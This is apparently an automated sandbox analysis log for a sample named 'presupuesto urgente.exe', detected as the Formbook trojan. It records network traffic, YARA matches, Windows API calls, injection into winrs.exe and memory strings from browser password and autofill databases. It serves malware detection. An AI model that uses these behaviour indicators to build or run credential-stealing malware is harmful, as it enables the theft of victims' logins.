        Set-Cookie: ASP.NET_SessionId=jrsx5mkgfgpcnqwjecgalre1; path=/; HttpOnly; SameSite=Lax
        Date: Fri, 04 Oct 2024 10:00:38 GMT
        Connection: close
        Content-Length: 1476
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Cache-Control: private,public
        Content-Type: text/html; charset=utf-8
        Set-Cookie: ASP.NET_SessionId=c2amcwrn3nza0amzggyfnv3v; path=/; HttpOnly; SameSite=Lax
        Date: Fri, 04 Oct 2024 10:00:40 GMT
        Connection: close
        Content-Length: 1476
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Cache-Control: private,public
        Content-Type: text/html; charset=utf-8
        Set-Cookie: ASP.NET_SessionId=df3g3dyd3cnzyo4re1j1ozuc; path=/; HttpOnly; SameSite=Lax
        Date: Fri, 04 Oct 2024 10:00:43 GMT
        Connection: close
        Content-Length: 1476
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private,publicContent-Type: text/html; charset=utf-8Set-Cookie: ASP.NET_SessionId=yjxzm0xtgg2mwcbx4vmy3tlz; path=/; HttpOnly; SameSite=LaxDate: Fri, 04 Oct 2024 10:00:46 GMTConnection: closeContent-Length: 1476Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 31 22 3e 3c 74 69 74 6c 65 3e 0d 0a 09 d8 b5 d9 81 d8 ad d9 87 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d9 8a d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b5 d9 81 d8 ad d9 87 2c d9 85 d9 88 d8 b1 d8 af 2c d9 86 d8 b8 d8 b1 2c d8 b4 d9 85 d8 a7 2c d9 8a d8 a7 d9 81 d8 aa 2c d9 86 d8 b4 d8 af 2c 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 55 73 65 72 73 2f 50 61 67 65 73 2f 37 31 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 64 69 76 3e 3c 64 69 76 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 26 6e 62 73 70 3b 3c 2f 64 69 76 3e 3c 68 31 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 32 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 33 22 3e 3c 73 74 72 6f 6e 67 3e 4f 6f 70 73 21 21 21 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 3c 64 69 76 3e 26 6e 62 73 70 3b 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 37 31 5f 30 22 3e 3c 73 70 61 6e 20 
63 6c 61 73 73 3d 22 5f 37 31 5f 35 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 5f 37 31 5f 36 22 3e 26 6e 62 73 70 3b 20 d9 85 d8 aa d8 a7 d8 b3 d9 81 d8 a7 d9 86 d9 87 20 d8 b5 d9 81 d8 ad d9 87 e2 80 8c db 8c 20 d9 85 d9 88 d8 b1 d8 af 20 d9 86 d8 b8 d8 b1 20 d8 b4 d9 85 d8 a7 20 d8 af d8 b1 20 d8 a7 db 8c d9 86 20 d9 88 d8 a8 20 d8 b3 d8 a7 db 8c d8 aa 20 db 8c d8 a7 d9 81 d8 aa 20 d9 86 d8 b4 d8 af 2e 20 d9 85 d9 85 da a9 d9 86 20 d8 a7 d8 b3 d8 aa 20 d9 85 d8 b4 da a9 d9 84 20 d8 a8 d9 88 d8 ac d9 88 d8 af 20 d8 a2 d9 85 d8 af d9 87 20 d9 85 d8 b1 d8 a8 d9 88 d8 b7 20 d8 a8 d9 87 20 db 8c da a9 db 8c 20 d8 a7 d8 b2 20 d8 af d9 84 d8 a7 db 8c d9 84 20 d8 b2 db 8c d8 b1 20 d8 a8 d8 a7 d8 b4 d8 af 3c 62 72 20 2f 3e 3c 62 72 20 2f 3e d9 85 d9 85 da a9 d9 86 20 d8 a7 d8 b3 d8 aa 20 d9 85 d8 b3 db 8c d8 b1 20 d9 84 db 8c d9 86 da a9 db 8c 20 da a9 d9 87 20 d9 88 d8 a7 d8 b1 d8 af 20 d8 b4 d8 af d9 87 20 d8 a7 d8 b4 d8 aa d8 a8 d8 a7 d9 87 20 d8 a7 d8 b3 d8 aa 2e 20 db 8c da a9 d8 a8 d8 a7 d8 b1 20 d8 af db 8c da af d8 b1 20
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 403 Forbidden
        content-length: 93
        cache-control: no-cache
        content-type: text/html
        connection: close
        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 10:02:10 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 16026
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 10:02:12 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 16026
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 10:02:15 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 16026
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 10:02:18 GMT
        Server: Apache
        X-Frame-Options: SAMEORIGIN
        Content-Length: 16026
        X-XSS-Protection: 1; mode=block
        Connection: close
        Content-Type: text/html; charset=utf-8
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 10:12:21 GMT
        Server: Apache
        Content-Length: 203
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 10:12:24 GMT
        Server: Apache
        Content-Length: 203
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 10:12:27 GMT
        Server: Apache
        Content-Length: 203
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 404 Not Found
        Date: Fri, 04 Oct 2024 10:12:30 GMT
        Server: Apache
        Content-Length: 203
        Connection: close
        Content-Type: text/html; charset=iso-8859-1
        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 403 Forbidden
        Server: hcdn
        Date: Fri, 04 Oct 2024 10:03:08 GMT
        Content-Type: text/html
        Content-Length: 149
        Connection: close
        Vary: Accept-Encoding
        Cross-Origin-Embedder-Policy: require-corp
        Cross-Origin-Opener-Policy: same-origin
        Cross-Origin-Resource-Policy: same-origin
        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
        Referrer-Policy: same-origin
        X-Frame-Options: SAMEORIGIN
        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        alt-svc: h3=":443"; ma=86400
        x-hcdn-request-id: 9aeb5fa323d8e82ef1c26dd1cee21776-bos-edge2
        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>hcdn</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 403 Forbidden
        Server: hcdn
        Date: Fri, 04 Oct 2024 10:03:11 GMT
        Content-Type: text/html
        Content-Length: 149
        Connection: close
        Vary: Accept-Encoding
        Cross-Origin-Embedder-Policy: require-corp
        Cross-Origin-Opener-Policy: same-origin
        Cross-Origin-Resource-Policy: same-origin
        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
        Referrer-Policy: same-origin
        X-Frame-Options: SAMEORIGIN
        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        alt-svc: h3=":443"; ma=86400
        x-hcdn-request-id: 65c4a942774adc74f6804865fdc49307-bos-edge4
        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>hcdn</center></body></html>
        Source: global traffic
        HTTP traffic detected: HTTP/1.1 403 Forbidden
        Server: hcdn
        Date: Fri, 04 Oct 2024 10:03:14 GMT
        Content-Type: text/html
        Content-Length: 4792
        Connection: close
        Vary: Accept-Encoding
        Cross-Origin-Embedder-Policy: require-corp
        Cross-Origin-Opener-Policy: same-origin
        Cross-Origin-Resource-Policy: same-origin
        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
        Referrer-Policy: same-origin
        X-Frame-Options: SAMEORIGIN
        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Expires: Thu, 01 Jan 1970 00:00:01 GMT
        alt-svc: h3=":443"; ma=86400
        x-hcdn-request-id: 58e7463fe1aea6dfc0061e5240fcba10-bos-edge1
        Data Ascii: <html><head><title>Checking your browser before accessing. Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta http-equiv="refresh" content="30"><style>div{text-align:center}.loader{margin:auto;width:50px;padding:8px;aspect-ratio:1;border-radius:50%;background:#25b09b;--_m:conic-gradient(
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 04 Oct 2024 10:04:57 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 16026 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html; charset=utf-8
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 04 Oct 2024 10:14:52 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknown HTTPS traffic detected: 142.251.40.174:443 -> 192.168.11.20:49730 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 142.250.176.193:443 -> 192.168.11.20:49731 version: TLS 1.2
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 0_2_00405553 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405553

        E-Banking Fraud

        Source: Yara match File source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_335734E0 NtCreateMutant,LdrInitializeThunk,2_2_335734E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33572B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_33572B90
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33572D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_33572D10
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33574260 NtSetContextThread,2_2_33574260
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33574570 NtSuspendThread,2_2_33574570
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33572B10 NtAllocateVirtualMemory,2_2_33572B10
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33572B00 NtQueryValueKey,2_2_33572B00
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33572B20 NtQueryInformationProcess,2_2_33572B20
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33572BC0 NtQueryInformationToken,2_2_33572BC0
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33572BE0 NtQueryVirtualMemory,2_2_33572BE0
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33572B80 NtCreateKey,2_2_33572B80
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33572A10 NtWriteFile,2_2_33572A10
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33572AC0 NtEnumerateValueKey,2_2_33572AC0
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33572A80 NtClose,2_2_33572A80
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33572AA0 NtQueryInformationFile,2_2_33572AA0
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_335729D0 NtWaitForSingleObject,2_2_335729D0
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_335729F0 NtReadFile,2_2_335729F0
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_335738D0 NtGetContextThread,2_2_335738D0
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33572F00 NtCreateFile,2_2_33572F00
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 2_2_33572F30 NtOpenDirectoryObject,2_2_33572F30
        Source: C:\Users\user\Desktop\presupuesto urgente.exe Code function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489
        Source: C:\Users\user\Desktop\presupuesto urgente.exe File created: C:\Windows\resources\0409
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: String function: 3352B910 appears 188 times
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: String function: 33587BE4 appears 71 times
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: String function: 335AE692 appears 65 times
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: String function: 335BEF10 appears 72 times
        Source: presupuesto urgente.exeStatic PE information: invalid certificate
        Source: presupuesto urgente.exe, 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameloyaliteters radierne.exeR vs presupuesto urgente.exe
        Source: presupuesto urgente.exe, 00000002.00000003.8323727937.0000000003598000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewinrs.exej% vs presupuesto urgente.exe
        Source: presupuesto urgente.exe, 00000002.00000002.8372612212.00000000337D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs presupuesto urgente.exe
        Source: presupuesto urgente.exe, 00000002.00000003.8266535897.0000000033485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs presupuesto urgente.exe
        Source: presupuesto urgente.exe, 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs presupuesto urgente.exe
        Source: presupuesto urgente.exe, 00000002.00000003.8323727937.00000000035AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewinrs.exej% vs presupuesto urgente.exe
        Source: presupuesto urgente.exe, 00000002.00000000.8031073005.0000000000457000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameloyaliteters radierne.exeR vs presupuesto urgente.exe
        Source: presupuesto urgente.exe, 00000002.00000003.8263145257.00000000332C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs presupuesto urgente.exe
        Source: presupuesto urgente.exeBinary or memory string: OriginalFilenameloyaliteters radierne.exeR vs presupuesto urgente.exe
        Source: presupuesto urgente.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/9@30/12
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_00404814 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404814
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
        Source: C:\Users\user\Desktop\presupuesto urgente.exeFile created: C:\Users\user\AppData\Local\Temp\nsx65A3.tmpJump to behavior
        Source: presupuesto urgente.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\presupuesto urgente.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: winrs.exe, 00000004.00000003.8586851291.000000000843B000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12653934881.0000000008444000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
        Source: winrs.exe, 00000004.00000003.8582122558.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8582423969.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12649540671.00000000032CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: winrs.exe, 00000004.00000003.8590352688.00000000084A4000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12653934881.00000000084B0000.00000004.00000020.00020000.00000000.sdmp, 16-84-3.4.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
        Source: presupuesto urgente.exeReversingLabs: Detection: 18%
        Source: presupuesto urgente.exeVirustotal: Detection: 22%
        Source: C:\Users\user\Desktop\presupuesto urgente.exeFile read: C:\Users\user\Desktop\presupuesto urgente.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\presupuesto urgente.exe "C:\Users\user\Desktop\presupuesto urgente.exe"
        Source: C:\Users\user\Desktop\presupuesto urgente.exeProcess created: C:\Users\user\Desktop\presupuesto urgente.exe "C:\Users\user\Desktop\presupuesto urgente.exe"
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeProcess created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"
        Source: C:\Windows\SysWOW64\winrs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeSection loaded: apphelp.dllJump to behavior
